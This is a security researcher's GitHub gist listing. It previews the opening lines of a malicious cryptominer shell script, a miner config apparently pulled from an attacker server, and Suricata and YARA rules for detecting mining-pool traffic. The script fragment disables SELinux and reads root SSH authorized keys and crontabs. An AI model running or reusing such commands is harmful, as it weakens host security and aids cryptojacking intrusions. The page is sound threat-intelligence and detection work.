I hereby claim:
- I am gelossnake on github.
- I am gelossnake (https://keybase.io/gelossnake) on keybase.
- I have a public key ASAwA_u6Qo3Rss8MsguyHw0fr0ouch111TV1zcmoTwOk0wo
To claim this, I am signing this object:
GelosSnake
/ sh
Last active
March 20, 2019 15:51
miner killer sh (malicious) - 21ab6585aacf15cbf414d492c470a987a5f47602a441816cbea3c69aa715b6cc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| setenforce 0 2>dev/null | |
| echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null | |
| sync && echo 3 >/proc/sys/vm/drop_caches | |
| crondir='/var/spool/cron/'"$USER" | |
| cont=`cat ${crondir}` | |
| ssht=`cat /root/.ssh/authorized_keys` | |
| echo 1 > /etc/devtools | |
| rtdir="/etc/devtools" | |
| bbdir="/usr/bin/curl" |
GelosSnake
/ gist:88694aef6c2819f1f11a42b73d09e421
Created
December 24, 2018 09:31
configuration used by sh miner killer taken from - 45[.]76[.]122[.]92
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| related hash: 21ab6585aacf15cbf414d492c470a987a5f47602a441816cbea3c69aa715b6cc | |
| source: hxxp://45[.]76.122.92:8506/IOFoqIgyC0zmf2UR/config.json | |
| { | |
| "algo": "cryptonight", // cryptonight (default) or cryptonight-lite | |
| "av": 0, // algorithm variation, 0 auto select | |
| "background": true, // true to run the miner in the background | |
| "colors": true, // false to disable colored output | |
| "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1 |
GelosSnake
/ crypto-Miners_public_pools_sig.txt
Last active
April 8, 2022 10:44
suricata crypto-miner pool rules
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Suricata 3.2+ | |
| alert dns $HOME_NET any -> any any (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minergate.com)"; dns_query; content:"pool.minergate.com"; nocase; isdataat:!1,relative; classtype:trojan-activity; sid:20000000; rev:1;) | |
| #Suricata 1.3+ | |
| alert udp $HOME_NET any -> any 53 (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minergate.com)"; content:"|01|"; offset:2; depth:1; content:"|00 01 00 00 00 00 00|"; distance:1; within:7; content:"|04|pool|09|minergate|03|com|00|"; nocase; distance:0; fast_pattern; classtype:trojan-activity; sid:20000000; rev:1;) | |
| #Suricata 3.2+ | |
| alert dns $HOME_NET any -> any any (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minexmr.com)"; dns_query; content:"pool.minexmr.com"; nocase; isdataat:!1,relative; classtype:trojan-activity; sid:20000001; rev:1;) |
GelosSnake
/ xmrig.yar
Last active
September 20, 2022 18:36
very simple yara to find xmrig Crypto-Miners
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule MinerGate | |
| { | |
| strings: | |
| $a1 = "minergate.com" | |
| condition: | |
| $a1 | |
| } | |
| rule MoneroOrg | |
| { |